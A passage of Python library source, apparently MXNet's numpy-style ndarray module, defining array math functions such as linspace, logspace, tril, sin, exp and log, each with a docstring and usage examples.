--------
>>> a = np.arange(60.).reshape(3,4,5)
>>> b = np.arange(24.).reshape(4,3,2)
>>> c = np.tensordot(a,b, axes=([1,0],[0,1]))
>>> c.shape
(5, 2)
>>> c
array([[ 4400., 4730.],
[ 4532., 4874.],
[ 4664., 5018.],
[ 4796., 5162.],
[ 4928., 5306.]])
"""
if _np.isscalar(axes):
return _npi.tensordot_int_axes(a, b, axes)
if len(axes) != 2:
raise ValueError('Axes must consist of two arrays.')
a_axes_summed, b_axes_summed = axes
if _np.isscalar(a_axes_summed):
a_axes_summed = (a_axes_summed,)
if _np.isscalar(b_axes_summed):
b_axes_summed = (b_axes_summed,)
if len(a_axes_summed) != len(b_axes_summed):
raise ValueError('Axes length mismatch')
return _npi.tensordot(a, b, a_axes_summed, b_axes_summed)
@set_module('mxnet.ndarray.numpy')
def histogram(a, bins=10, range=None, normed=None, weights=None, density=None): # pylint: disable=too-many-arguments
"""
Compute the histogram of a set of data.
Parameters
----------
a : ndarray
Input data. The histogram is computed over the flattened array.
bins : int or NDArray
If `bins` is an int, it defines the number of equal-width
bins in the given range (10, by default). If `bins` is a
sequence, it defines a monotonically increasing array of bin edges,
including the rightmost edge, allowing for non-uniform bin widths.
.. versionadded:: 1.11.0
If `bins` is a string, it defines the method used to calculate the
optimal bin width, as defined by `histogram_bin_edges`.
range : (float, float)
The lower and upper range of the bins. Required when `bins` is an integer.
Values outside the range are ignored. The first element of the range must
be less than or equal to the second.
normed : bool, optional
Not supported yet, coming soon.
weights : array_like, optional
Not supported yet, coming soon.
density : bool, optional
Not supported yet, coming soon.
"""
if normed is True:
raise NotImplementedError("normed is not supported yet...")
if weights is not None:
raise NotImplementedError("weights is not supported yet...")
if density is True:
raise NotImplementedError("density is not supported yet...")
if isinstance(bins, numeric_types):
if range is None:
raise NotImplementedError("automatic range is not supported yet...")
return _npi.histogram(a, bin_cnt=bins, range=range)
if isinstance(bins, (list, tuple)):
raise NotImplementedError("array_like bins is not supported yet...")
if isinstance(bins, str):
raise NotImplementedError("string bins is not supported yet...")
if isinstance(bins, NDArray):
return _npi.histogram(a, bins=bins)
raise ValueError("np.histogram fails with", locals())
@set_module('mxnet.ndarray.numpy')
def eye(N, M=None, k=0, dtype=_np.float32, **kwargs):
"""
Return a 2-D array with ones on the diagonal and zeros elsewhere.
Parameters
----------
N : int
Number of rows in the output.
M : int, optional
Number of columns in the output. If None, defaults to N.
k : int, optional
Index of the diagonal: 0 (the default) refers to the main diagonal,
a positive value refers to an upper diagonal,
and a negative value to a lower diagonal.
dtype : data-type, optional
Data-type of the returned array.
Returns
-------
I : ndarray of shape (N,M)
An array where all elements are equal to zero,
except for the k-th diagonal, whose values are equal to one.
"""
_sanity_check_params('eye', ['order'], kwargs)
ctx = kwargs.pop('ctx', current_context())
if ctx is None:
ctx = current_context()
return _npi.eye(N, M, k, ctx, dtype)
@set_module('mxnet.ndarray.numpy')
def linspace(start, stop, num=50, endpoint=True, retstep=False, dtype=None, axis=0, ctx=None): # pylint: disable=too-many-arguments
r"""
Return evenly spaced numbers over a specified interval.
Returns num evenly spaced samples, calculated over the interval [start, stop].
The endpoint of the interval can optionally be excluded.
Parameters
----------
start : real number
The starting value of the sequence.
stop : real number
The end value of the sequence, unless endpoint is set to False. In
that case, the sequence consists of all but the last of num + 1
evenly spaced samples, so that stop is excluded. Note that the step
size changes when endpoint is False.
num : int, optional
Number of samples to generate. Default is 50. Must be non-negative.
endpoint : bool, optional
If True, stop is the last sample. Otherwise, it is not included.
Default is True.
retstep : bool, optional
If True, return (samples, step), where step is the spacing between samples.
dtype : dtype, optional
The type of the output array. If dtype is not given, infer the data
type from the other input arguments.
axis : int, optional
The axis in the result to store the samples. Relevant only if start or
stop are array-like. By default (0), the samples will be along a new
axis inserted at the beginning. Use -1 to get an axis at the end.
Returns
-------
samples : ndarray
There are num equally spaced samples in the closed interval
`[start, stop]` or the half-open interval `[start, stop)`
(depending on whether endpoint is True or False).
step : float, optional
Only returned if retstep is True
Size of spacing between samples.
See Also
--------
arange : Similar to `linspace`, but uses a step size (instead of the
number of samples).
Examples
--------
>>> np.linspace(2.0, 3.0, num=5)
array([2. , 2.25, 2.5 , 2.75, 3. ])
>>> np.linspace(2.0, 3.0, num=5, endpoint=False)
array([2. , 2.2, 2.4, 2.6, 2.8])
>>> np.linspace(2.0, 3.0, num=5, retstep=True)
(array([2. , 2.25, 2.5 , 2.75, 3. ]), 0.25)
Graphical illustration:
>>> import matplotlib.pyplot as plt
>>> N = 8
>>> y = np.zeros(N)
>>> x1 = np.linspace(0, 10, N, endpoint=True)
>>> x2 = np.linspace(0, 10, N, endpoint=False)
>>> plt.plot(x1.asnumpy(), y.asnumpy(), 'o')
[<matplotlib.lines.Line2D object at 0x...>]
>>> plt.plot(x2.asnumpy(), (y + 0.5).asnumpy(), 'o')
[<matplotlib.lines.Line2D object at 0x...>]
>>> plt.ylim([-0.5, 1])
(-0.5, 1)
>>> plt.show()
Notes
-----
This function differs from the original `numpy.linspace
<https://docs.scipy.org/doc/numpy/reference/generated/numpy.linspace.html>`_ in
the following aspects:
- `start` and `stop` do not support list, numpy ndarray and mxnet ndarray
- axis could only be 0
- There could be an additional `ctx` argument to specify the device, e.g. the i-th
GPU.
"""
if isinstance(start, (list, _np.ndarray, NDArray)) or \
isinstance(stop, (list, _np.ndarray, NDArray)):
raise NotImplementedError('start and stop only support int')
if axis != 0:
raise NotImplementedError("the function only support axis 0")
if ctx is None:
ctx = current_context()
if retstep:
step = (stop - start) / (num - 1)
return _npi.linspace(start=start, stop=stop, num=num, endpoint=endpoint, ctx=ctx, dtype=dtype), step
else:
return _npi.linspace(start=start, stop=stop, num=num, endpoint=endpoint, ctx=ctx, dtype=dtype)
@set_module('mxnet.ndarray.numpy')
def logspace(start, stop, num=50, endpoint=True, base=10.0, dtype=None, axis=0, ctx=None): # pylint: disable=too-many-arguments
r"""Return numbers spaced evenly on a log scale.
In linear space, the sequence starts at ``base ** start``
(`base` to the power of `start`) and ends with ``base ** stop``
(see `endpoint` below).
Non-scalar `start` and `stop` are now supported.
Parameters
----------
start : int or float
``base ** start`` is the starting value of the sequence.
stop : int or float
``base ** stop`` is the final value of the sequence, unless `endpoint`
is False. In that case, ``num + 1`` values are spaced over the
interval in log-space, of which all but the last (a sequence of
length `num`) are returned.
num : integer, optional
Number of samples to generate. Default is 50.
endpoint : boolean, optional
If true, `stop` is the last sample. Otherwise, it is not included.
Default is True.
base : float, optional
The base of the log space. The step size between the elements in
``ln(samples) / ln(base)`` (or ``log_base(samples)``) is uniform.
Default is 10.0.
dtype : dtype
The type of the output array. If `dtype` is not given, infer the data
type from the other input arguments.
axis : int, optional
The axis in the result to store the samples. Relevant only if start
or stop are array-like. By default (0), the samples will be along a
new axis inserted at the beginning. Now, axis only support axis = 0.
ctx : Context, optional
An optional device context (default is the current default context).
Returns
-------
samples : ndarray
`num` samples, equally spaced on a log scale.
See Also
--------
arange : Similar to linspace, with the step size specified instead of the
number of samples. Note that, when used with a float endpoint, the
endpoint may or may not be included.
linspace : Similar to logspace, but with the samples uniformly distributed
in linear space, instead of log space.
Notes
-----
Logspace is equivalent to the code. Now wo only support axis = 0.
>>> y = np.linspace(start, stop, num=num, endpoint=endpoint)
...
>>> power(base, y).astype(dtype)
...
Examples
--------
>>> np.logspace(2.0, 3.0, num=4)
array([ 100. , 215.44347, 464.15887, 1000. ])
>>> np.logspace(2.0, 3.0, num=4, endpoint=False)
array([100. , 177.82794, 316.22775, 562.3413 ])
>>> np.logspace(2.0, 3.0, num=4, base=2.0)
array([4. , 5.0396843, 6.349604 , 8. ])
>>> np.logspace(2.0, 3.0, num=4, base=2.0, dtype=np.int32)
array([4, 5, 6, 8], dtype=int32)
>>> np.logspace(2.0, 3.0, num=4, ctx=npx.gpu(0))
array([ 100. , 215.44347, 464.15887, 1000. ], ctx=gpu(0))
"""
if isinstance(start, (list, tuple, _np.ndarray, NDArray)) or \
isinstance(stop, (list, tuple, _np.ndarray, NDArray)):
raise NotImplementedError('start and stop only support int and float')
if axis != 0:
raise NotImplementedError("the function only support axis 0")
if ctx is None:
ctx = current_context()
return _npi.logspace(start=start, stop=stop, num=num, endpoint=endpoint, base=base, ctx=ctx, dtype=dtype)
@set_module('mxnet.ndarray.numpy')
def expand_dims(a, axis):
"""Expand the shape of an array.
Insert a new axis that will appear at the `axis` position in the expanded
Parameters
----------
a : ndarray
Input array.
axis : int
Position in the expanded axes where the new axis is placed.
Returns
-------
res : ndarray
Output array. The number of dimensions is one greater than that of
the input array.
"""
return _npi.expand_dims(a, axis)
@set_module('mxnet.ndarray.numpy')
@wrap_np_binary_func
def lcm(x1, x2, out=None, **kwargs):
"""
Returns the lowest common multiple of ``|x1|`` and ``|x2|``
Parameters
----------
x1, x2 : ndarrays or scalar values
The arrays for computing lowest common multiple. If x1.shape != x2.shape,
they must be broadcastable to a common shape (which may be the shape of
one or the other).
out : ndarray or None, optional
A location into which the result is stored. If provided, it must have a shape
that the inputs broadcast to. If not provided or None, a freshly-allocated array
is returned.
Returns
-------
y : ndarray or scalar
The lowest common multiple of the absolute value of the inputs
This is a scalar if both `x1` and `x2` are scalars.
See Also
--------
gcd : The greatest common divisor
Examples
--------
>>> np.lcm(12, 20)
60
>>> np.lcm(np.arange(6, dtype=int), 20)
array([ 0, 20, 20, 60, 20, 20], dtype=int64)
"""
return _ufunc_helper(x1, x2, _npi.lcm, _np.lcm, _npi.lcm_scalar, None, out)
@set_module('mxnet.ndarray.numpy')
def tril(m, k=0):
r"""
Lower triangle of an array.
Return a copy of an array with elements above the `k`-th diagonal zeroed.
Parameters
----------
m : ndarray, shape (M, N)
Input array.
k : int, optional
Diagonal above which to zero elements. `k = 0` (the default) is the
main diagonal, `k < 0` is below it and `k > 0` is above.
Returns
-------
tril : ndarray, shape (M, N)
Lower triangle of `m`, of same shape and data-type as `m`.
See Also
--------
triu : same thing, only for the upper triangle
Examples
--------
>>> a = np.array([[1,2,3],[4,5,6],[7,8,9],[10,11,12]])
>>> np.tril(a, -1)
array([[ 0., 0., 0.],
[ 4., 0., 0.],
[ 7., 8., 0.],
[10., 11., 12.]])
"""
return _npi.tril(m, k)
def _unary_func_helper(x, fn_array, fn_scalar, out=None, **kwargs):
"""Helper function for unary operators.
Parameters
----------
x : ndarray or scalar
Input of the unary operator.
fn_array : function
Function to be called if x is of ``ndarray`` type.
fn_scalar : function
Function to be called if x is a Python scalar.
out : ndarray
The buffer ndarray for storing the result of the unary function.
Returns
-------
out : mxnet.numpy.ndarray or scalar
Result array or scalar.
"""
if isinstance(x, numeric_types):
return fn_scalar(x, **kwargs)
elif isinstance(x, NDArray):
return fn_array(x, out=out, **kwargs)
else:
raise TypeError('type {} not supported'.format(str(type(x))))
@set_module('mxnet.ndarray.numpy')
@wrap_np_unary_func
def sin(x, out=None, **kwargs):
r"""
Trigonometric sine, element-wise.
Parameters
----------
x : ndarray or scalar
Angle, in radians (:math:`2 \pi` rad equals 360 degrees).
out : ndarray or None
A location into which the result is stored. If provided, it
must have a shape that the inputs broadcast to. If not provided
or None, a freshly-allocated array is returned. The dtype of the
output is the same as that of the input if the input is an ndarray.
Returns
-------
y : ndarray or scalar
The sine of each element of x. This is a scalar if `x` is a scalar.
Notes
----
This function only supports input type of float.
Examples
--------
>>> np.sin(np.pi/2.)
1.0
>>> np.sin(np.array((0., 30., 45., 60., 90.)) * np.pi / 180.)
array([0. , 0.5 , 0.70710677, 0.86602545, 1. ])
"""
return _unary_func_helper(x, _npi.sin, _np.sin, out=out, **kwargs)
@set_module('mxnet.ndarray.numpy')
@wrap_np_unary_func
def cos(x, out=None, **kwargs):
r"""
Cosine, element-wise.
Parameters
----------
x : ndarray or scalar
Angle, in radians (:math:`2 \pi` rad equals 360 degrees).
out : ndarray or None
A location into which the result is stored. If provided, it
must have a shape that the inputs broadcast to. If not provided
or None, a freshly-allocated array is returned. The dtype of the
output is the same as that of the input if the input is an ndarray.
Returns
-------
y : ndarray or scalar
The corresponding cosine values. This is a scalar if x is a scalar.
Notes
----
This function only supports input type of float.
Examples
--------
>>> np.cos(np.array([0, np.pi/2, np.pi]))
array([ 1.000000e+00, -4.371139e-08, -1.000000e+00])
>>> # Example of providing the optional output parameter
>>> out1 = np.array([0], dtype='f')
>>> out2 = np.cos(np.array([0.1]), out1)
>>> out2 is out1
True
"""
return _unary_func_helper(x, _npi.cos, _np.cos, out=out, **kwargs)
@set_module('mxnet.ndarray.numpy')
@wrap_np_unary_func
def sinh(x, out=None, **kwargs):
"""
Hyperbolic sine, element-wise.
Equivalent to ``1/2 * (np.exp(x) - np.exp(-x))`` or ``-1j * np.sin(1j*x)``.
Parameters
----------
x : ndarray or scalar
Input array or scalar.
out : ndarray or None
A location into which the result is stored. If provided, it
must have a shape that the inputs broadcast to. If not provided
or None, a freshly-allocated array is returned. The dtype of the
output is the same as that of the input if the input is an ndarray.
Returns
-------
y : ndarray or scalar
The corresponding hyperbolic sine values. This is a scalar if `x` is a scalar.
Notes
----
This function only supports input type of float.
Examples
--------
>>> np.sinh(0)
0.0
>>> # Example of providing the optional output parameter
>>> out1 = np.array([0], dtype='f')
>>> out2 = np.sinh(np.array([0.1]), out1)
>>> out2 is out1
True
"""
return _unary_func_helper(x, _npi.sinh, _np.sinh, out=out, **kwargs)
@set_module('mxnet.ndarray.numpy')
@wrap_np_unary_func
def cosh(x, out=None, **kwargs):
"""
Hyperbolic cosine, element-wise.
Equivalent to ``1/2 * (np.exp(x) + np.exp(-x))`` and ``np.cos(1j*x)``.
Parameters
----------
x : ndarray or scalar
Input array or scalar.
out : ndarray or None
A location into which the result is stored. If provided, it
must have a shape that the inputs broadcast to. If not provided
or None, a freshly-allocated array is returned. The dtype of the
output is the same as that of the input if the input is an ndarray.
Returns
-------
y : ndarray or scalar
The corresponding hyperbolic cosine values. This is a scalar if `x` is a scalar.
Notes
----
This function only supports input type of float.
Examples
--------
>>> np.cosh(0)
1.0
"""
return _unary_func_helper(x, _npi.cosh, _np.cosh, out=out, **kwargs)
@set_module('mxnet.ndarray.numpy')
@wrap_np_unary_func
def tanh(x, out=None, **kwargs):
"""
Compute hyperbolic tangent element-wise.
Equivalent to ``np.sinh(x)/np.cosh(x)``.
Parameters
----------
x : ndarray or scalar.
Input array.
out : ndarray or None
A location into which the result is stored. If provided, it
must have a shape that the inputs fill into. If not provided
or None, a freshly-allocated array is returned. The dtype of the
output and input must be the same.
Returns
-------
y : ndarray or scalar
The corresponding hyperbolic tangent values.
Notes
-----
If `out` is provided, the function writes the result into it,
and returns a reference to `out`. (See Examples)
- input x does not support complex computation (like imaginary number)
>>> np.tanh(np.pi*1j)
TypeError: type <type 'complex'> not supported
Examples
--------
>>> np.tanh(np.array[0, np.pi]))
array([0. , 0.9962721])
>>> np.tanh(np.pi)
0.99627207622075
>>> # Example of providing the optional output parameter illustrating
>>> # that what is returned is a reference to said parameter
>>> out1 = np.array(1)
>>> out2 = np.tanh(np.array(0.1), out1)
>>> out2 is out1
True
"""
return _unary_func_helper(x, _npi.tanh, _np.tanh, out=out, **kwargs)
@set_module('mxnet.ndarray.numpy')
@wrap_np_unary_func
def log10(x, out=None, **kwargs):
"""
Return the base 10 logarithm of the input array, element-wise.
Parameters
----------
x : ndarray or scalar
Input array or scalar.
out : ndarray or None
A location into which t'absolute', he result is stored. If provided, it
must have a shape that the inputs broadcast to. If not provided
or None, a freshly-allocated array is returned. The dtype of the
output is the same as that of the input if the input is an ndarray.
Returns
-------
y : ndarray or scalar
The logarithm to the base 10 of `x`, element-wise. NaNs are
returned where x is negative. This is a scalar if `x` is a scalar.
Notes
----
This function only supports input type of float.
Examples
--------
>>> np.log10(np.array([1e-15, -3.]))
array([-15., nan])
"""
return _unary_func_helper(x, _npi.log10, _np.log10, out=out, **kwargs)
@set_module('mxnet.ndarray.numpy')
@wrap_np_unary_func
def sqrt(x, out=None, **kwargs):
"""
Return the non-negative square-root of an array, element-wise.
Parameters
----------
x : ndarray or scalar
The values whose square-roots are required.
out : ndarray, or None, optional
A location into which the result is stored. If provided, it must have
a shape that the inputs broadcast to. If not provided or `None`,
a freshly-allocated array is returned.
Returns
-------
y : ndarray or scalar
An array of the same shape as `x`, containing the positive
square-root of each element in `x`. This is a scalar if `x` is a scalar.
Notes
----
This function only supports input type of float.
Examples
--------
>>> np.sqrt(np.array([1,4,9]))
array([1., 2., 3.])
>>> np.sqrt(np.array([4, -1, _np.inf]))
array([ 2., nan, inf])
"""
return _unary_func_helper(x, _npi.sqrt, _np.sqrt, out=out, **kwargs)
@set_module('mxnet.ndarray.numpy')
@wrap_np_unary_func
def cbrt(x, out=None, **kwargs):
r"""
Return the cube-root of an array, element-wise.
Parameters
----------
x : ndarray
The values whose cube-roots are required.
out : ndarray, optional
A location into which the result is stored. If provided, it must have a shape that the
inputs broadcast to. If not provided or None, a freshly-allocated array is returned.
A tuple (possible only as a keyword argument) must have length equal to the number of outputs.
Returns
----------
y : ndarray
An array of the same shape as x, containing the cube cube-root of each element in x.
If out was provided, y is a reference to it. This is a scalar if x is a scalar.
Examples
----------
>>> np.cbrt([1,8,27])
array([ 1., 2., 3.])
"""
return _unary_func_helper(x, _npi.cbrt, _np.cbrt, out=out, **kwargs)
@set_module('mxnet.ndarray.numpy')
@wrap_np_unary_func
def abs(x, out=None, **kwargs):
r"""
Calculate the absolute value element-wise.
Parameters
----------
x : ndarray or scalar
Input array.
out : ndarray or None, optional
A location into which the result is stored. If provided, it must have
a shape that the inputs broadcast to. If not provided or `None`,
a freshly-allocated array is returned.
Returns
-------
absolute : ndarray
An ndarray containing the absolute value of
each element in `x`. This is a scalar if `x` is a scalar.
Examples
--------
>>> x = np.array([-1.2, 1.2])
>>> np.abs(x)
array([1.2, 1.2])
"""
return _unary_func_helper(x, _npi.abs, _np.abs, out=out, **kwargs)
@set_module('mxnet.ndarray.numpy')
@wrap_np_unary_func
def absolute(x, out=None, **kwargs):
r"""
Calculate the absolute value element-wise.
np.abs is a shorthand for this function.
Parameters
----------
x : ndarray
Input array.
out : ndarray, optional
A location into which the result is stored. If provided, it must have a shape
that the inputs broadcast to. If not provided or None, a freshly-allocated array is returned.
A tuple (possible only as a keyword argument) must have length equal to the number of outputs.
Returns
----------
absolute : ndarray
An ndarray containing the absolute value of each element in x.
Examples
----------
>>> x = np.array([-1.2, 1.2])
>>> np.absolute(x)
array([ 1.2, 1.2])
"""
return _unary_func_helper(x, _npi.absolute, _np.absolute, out=out, **kwargs)
@set_module('mxnet.ndarray.numpy')
@wrap_np_unary_func
def sign(x, out=None, **kwargs):
r"""
Returns an element-wise indication of the sign of a number.
The `sign` function returns ``-1 if x < 0, 0 if x==0, 1 if x > 0``. Only supports real number.
Parameters
----------
x : ndarray or a scalar
Input values.
out : ndarray or None, optional
A location into which the result is stored.
If provided, it must have the same shape and dtype as input ndarray.
If not provided or `None`, a freshly-allocated array is returned.
Returns
-------
y : ndarray
The sign of `x`.
This is a scalar if `x` is a scalar.
Note
-------
- Only supports real number as input elements.
- Input type does not support Python native iterables(list, tuple, ...).
- ``out`` param: cannot perform auto broadcasting. ``out`` ndarray's shape must be the same as the expected output.
- ``out`` param: cannot perform auto type cast. ``out`` ndarray's dtype must be the same as the expected output.
- ``out`` param does not support scalar input case.
Examples
--------
>>> a = np.array([-5., 4.5])
>>> np.sign(a)
array([-1., 1.])
>>> # Use scalars as inputs:
>>> np.sign(4.0)
1.0
>>> np.sign(0)
0
>>> # Use ``out`` parameter:
>>> b = np.zeros((2, ))
>>> np.sign(a, out=b)
array([-1., 1.])
>>> b
array([-1., 1.])
"""
return _unary_func_helper(x, _npi.sign, _np.sign, out=out, **kwargs)
@set_module('mxnet.ndarray.numpy')
@wrap_np_unary_func
def exp(x, out=None, **kwargs):
r"""
Calculate the exponential of all elements in the input array.
Parameters
----------
x : ndarray or scalar
Input values.
out : ndarray or None, optional
A location into which the result is stored. If provided, it must have
a shape that the inputs broadcast to. If not provided or `None`,
a freshly-allocated array is returned.
Returns
-------
out : ndarray or scalar
Output array, element-wise exponential of `x`.
This is a scalar if `x` is a scalar.
Examples
--------
>>> np.exp(1)
2.718281828459045
>>> x = np.array([-1, 1, -2, 2])
>>> np.exp(x)
array([0.36787945, 2.7182817 , 0.13533528, 7.389056 ])
"""
return _unary_func_helper(x, _npi.exp, _np.exp, out=out, **kwargs)
@set_module('mxnet.ndarray.numpy')
@wrap_np_unary_func
def expm1(x, out=None, **kwargs):
r"""
Calculate `exp(x) - 1` of all elements in the input array.
Parameters
----------
x : ndarray or scalar
Input values.
out : ndarray or None, optional
A location into which the result is stored. If provided, it must have
a shape that the inputs broadcast to. If not provided or `None`,
a freshly-allocated array is returned.
Returns
-------
out : ndarray or scalar
Output array, element-wise exponential minus one: `out = exp(x) - 1`.
This is a scalar if `x` is a scalar.
Examples
--------
>>> np.expm1(1)
1.718281828459045
>>> x = np.array([-1, 1, -2, 2])
>>> np.expm1(x)
array([-0.63212056, 1.71828183, -0.86466472, 6.3890561])
"""
return _unary_func_helper(x, _npi.expm1, _np.expm1, out=out, **kwargs)
@set_module('mxnet.ndarray.numpy')
@wrap_np_unary_func
def arcsin(x, out=None, **kwargs):
r"""
Inverse sine, element-wise.
Parameters
----------
x : ndarray or scalar
`y`-coordinate on the unit circle.
out : ndarray or None, optional
A location into which the result is stored.
If provided, it must have the same shape as the input.
If not provided or None, a freshly-allocated array is returned.
Returns
-------
angle : ndarray or scalar
Output array is same shape and type as x. This is a scalar if x is a scalar.
The inverse sine of each element in `x`, in radians and in the
closed interval ``[-pi/2, pi/2]``.
Examples
--------
>>> np.arcsin(1) # pi/2
1.5707963267948966
>>> np.arcsin(-1) # -pi/2
-1.5707963267948966
>>> np.arcsin(0)
0.0
Notes
-----
`arcsin` is a multivalued function: for each `x` there are infinitely
many numbers `z` such that :math:`sin(z) = x`. The convention is to
return the angle `z` whose real part lies in [-pi/2, pi/2].
For real-valued input data types, *arcsin* always returns real output.
For each value that cannot be expressed as a real number or infinity,
it yields ``nan`` and sets the `invalid` floating point error flag.
The inverse sine is also known as `asin` or sin^{-1}.
The output `ndarray` has the same `ctx` as the input `ndarray`.
This function differs from the original `numpy.arcsin
<https://docs.scipy.org/doc/numpy/reference/generated/numpy.arcsin.html>`_ in
the following aspects:
- Only support ndarray or scalar now.
- `where` argument is not supported.
- Complex input is not supported.
References
----------
Abramowitz, M. and Stegun, I. A., *Handbook of Mathematical Functions*,
10th printing, New York: Dover, 1964, pp. 79ff.
http://www.math.sfu.ca/~cbm/aands/
"""
return _unary_func_helper(x, _npi.arcsin, _np.arcsin, out=out, **kwargs)
@set_module('mxnet.ndarray.numpy')
@wrap_np_unary_func
def arccos(x, out=None, **kwargs):
r"""
Trigonometric inverse cosine, element-wise.
The inverse of cos so that, if y = cos(x), then x = arccos(y).
Parameters
----------
x : ndarray
x-coordinate on the unit circle. For real arguments, the domain is [-1, 1].
out : ndarray, optional
A location into which the result is stored. If provided, it must have a shape that
the inputs broadcast to. If not provided or None, a freshly-allocated array is returned.
A tuple (possible only as a keyword argument) must have length equal to the number of outputs.
Returns
----------
angle : ndarray
The angle of the ray intersecting the unit circle at the given x-coordinate in radians [0, pi].
This is a scalar if x is a scalar.
See also
----------
cos, arctan, arcsin
Notes
----------
arccos is a multivalued function: for each x there are infinitely many numbers z such that
cos(z) = x. The convention is to return the angle z whose real part lies in [0, pi].
For real-valued input data types, arccos always returns real output.
For each value that cannot be expressed as a real number or infinity, it yields nan and sets
the invalid floating point error flag.
The inverse cos is also known as acos or cos^-1.
Examples
----------
>>> np.arccos([1, -1])
array([ 0. , 3.14159265])
"""
return _unary_func_helper(x, _npi.arccos, _np.arccos, out=out, **kwargs)
@set_module('mxnet.ndarray.numpy')
@wrap_np_unary_func
def arctan(x, out=None, **kwargs):
r"""
Trigonometric inverse tangent, element-wise.
The inverse of tan, so that if ``y = tan(x)`` then ``x = arctan(y)``.
Parameters
----------
x : ndarray or scalar
Input values.
out : ndarray or None, optional
A location into which the result is stored. If provided, it must have
a shape that the inputs broadcast to. If not provided or `None`,
a freshly-allocated array is returned.
Returns
-------
out : ndarray or scalar
Out has the same shape as `x`. It lies is in
``[-pi/2, pi/2]`` (``arctan(+/-inf)`` returns ``+/-pi/2``).
This is a scalar if `x` is a scalar.
Notes
-----
`arctan` is a multi-valued function: for each `x` there are infinitely
many numbers `z` such that tan(`z`) = `x`. The convention is to return
the angle `z` whose real part lies in [-pi/2, pi/2].
For real-valued input data types, `arctan` always returns real output.
For each value that cannot be expressed as a real number or infinity,
it yields ``nan`` and sets the `invalid` floating point error flag.
For complex-valued input, we do not have support for them yet.
The inverse tangent is also known as `atan` or tan^{-1}.
Examples
--------
>>> x = np.array([0, 1])
>>> np.arctan(x)
array([0. , 0.7853982])
>>> np.pi/4
0.7853981633974483
"""
return _unary_func_helper(x, _npi.arctan, _np.arctan, out=out, **kwargs)
@set_module('mxnet.ndarray.numpy')
@wrap_np_unary_func
def log(x, out=None, **kwargs):
"""
Natural logarithm, element-wise.
The natural logarithm `log` is the inverse of the exponential function,
so that `log(exp(x)) = x`. The natural logarithm is logarithm in base
`e`.
Parameters
----------
x : ndarray
Input value. Elements must be of real value.
out : ndarray or None, optional
A location into which the result is stored.
If provided, it must have the same shape and dtype as input ndarray.
If not provided or `None`, a freshly-allocated array is returned.
Returns
-------
y : ndarray
The natural logarithm of `x`, element-wise.
This is a scalar if `x` is a scalar.
Notes
-----
Currently only supports data of real values and ``inf`` as input. Returns data of real value, ``inf``, ``-inf`` and
``nan`` according to the input.
This function differs from the original `numpy.log
<https://docs.scipy.org/doc/numpy/reference/generated/numpy.log.html>`_ in
the following aspects:
- Does not support complex number for now
- Input type does not support Python native iterables(list, tuple, ...).
- ``out`` param: cannot perform auto broadcasting. ``out`` ndarray's shape must be the same as the expected output.
- ``out`` param: cannot perform auto type cast. ``out`` ndarray's dtype must be the same as the expected output.
- ``out`` param does not support scalar input case.
Examples
--------
>>> a = np.array([1, np.exp(1), np.exp(2), 0], dtype=np.float64)
>>> np.log(a)
array([ 0., 1., 2., -inf], dtype=float64)
>>> # Using default float32 dtype may lead to slightly different behavior:
>>> a = np.array([1, np.exp(1), np.exp(2), 0], dtype=np.float32)
>>> np.log(a)
array([ 0., 0.99999994, 2., -inf])
>>> np.log(1)
0.0
"""
return _unary_func_helper(x, _npi.log, _np.log, out=out, **kwargs)
@set_module('mxnet.ndarray.numpy')
@wrap_np_unary_func
def degrees(x, out=None, **kwargs):
"""
Convert angles from radians to degrees.
Parameters
----------
x : ndarray
Input value. Elements must be of real value.
out : ndarray or None, optional
A location into which the result is stored.
If provided, it must have the same shape and dtype as input ndarray.
If not provided or `None`, a freshly-allocated array is returned.
Returns
-------
y : ndarray
The corresponding degree values; if `out` was supplied this is a
reference to it.
This is a scalar if `x` is a scalar.
Notes
-------
This function differs from the original `numpy.degrees
<https://docs.scipy.org/doc/numpy/reference/generated/numpy.degrees.html>`_ in
the following aspects:
- Input type does not support Python native iterables(list, tuple, ...). Only ndarray is supported.
- ``out`` param: cannot perform auto broadcasting. ``out`` ndarray's shape must be the same as the expected output.
- ``out`` param: cannot perform auto type cast. ``out`` ndarray's dtype must be the same as the expected output.
- ``out`` param does not support scalar input case.
Examples
--------
>>> rad = np.arange(12.) * np.pi / 6
>>> np.degrees(rad)
array([ 0., 30., 60., 90., 120., 150., 180., 210., 240., 270., 300., 330.])
>>> # Use specified ``out`` ndarray:
>>> out = np.zeros((rad.shape))
>>> np.degrees(rad, out)
array([ 0., 30., 60., 90., 120., 150., 180., 210., 240., 270., 300., 330.])
>>> out
array([ 0., 30., 60., 90., 120., 150., 180., 210., 240., 270., 300., 330.])
"""
return _unary_func_helper(x, _npi.degrees, _np.degrees, out=out, **kwargs)
@set_module('mxnet.ndarray.numpy')
@wrap_np_unary_func
def rad2deg(x, out=None, **kwargs):
r"""
Convert angles from radians to degrees.
Parameters
----------
x : ndarray or scalar
Angles in degrees.
out : ndarray or None, optional
A location into which the result is stored. If not provided or `None`,
a freshly-allocated array is returned.
Returns
-------
y : ndarray or scalar
The corresponding angle in radians.
This is a scalar if `x` is a scalar.
Notes
-----
"rad2deg(x)" is "x *180 / pi".
This function differs from the original numpy.arange in the following aspects:
- Only support float32 and float64.
- `out` must be in the same size of input.
Examples
--------
>>> np.rad2deg(np.pi/2)
90.0
"""
return _unary_func_helper(x, _npi.rad2deg, _np.rad2deg, out=out)
@set_module('mxnet.ndarray.numpy')
@wrap_np_unary_func
def rint(x, out=None, **kwargs):
"""
Round elements of the array to the nearest integer.
Parameters
----------
x : ndarray or scalar
Input array.
out : ndarray or None
A location into which the result is stored.
If provided, it must have the same shape and type as the input.
If not provided or None, a freshly-allocated array is returned.
Returns
-------
out : ndarray or scalar
Output array is same shape and type as x. This is a scalar if x is a scalar.
Notes
-----
This function differs from the original `numpy.rint
<https://docs.scipy.org/doc/numpy/reference/generated/numpy.rint.html>`_ in
the following way(s):
- only ndarray or scalar is accpted as valid input, tuple of ndarray is not supported
- broadcasting to `out` of different shape is currently not supported
- when input is plain python numerics, the result will not be stored in the `out` param
Examples
--------
>>> a = np.array([-1.7, -1.5, -0.2, 0.2, 1.5, 1.7, 2.0])
>>> np.rint(a)
array([-2., -2., -0., 0., 1., 2., 2.])
"""
return _unary_func_helper(x, _npi.rint, _np.rint, out=out, **kwargs)
@set_module('mxnet.ndarray.numpy')
@wrap_np_unary_func
def log2(x, out=None, **kwargs):
"""
Base-2 logarithm of x.
Parameters
----------
x : ndarray or scalar
Input values.
out : ndarray or None
A location into which the result is stored.
If provided, it must have the same shape and type as the input.
If not provided or None, a freshly-allocated array is returned.
Returns
-------
y : ndarray
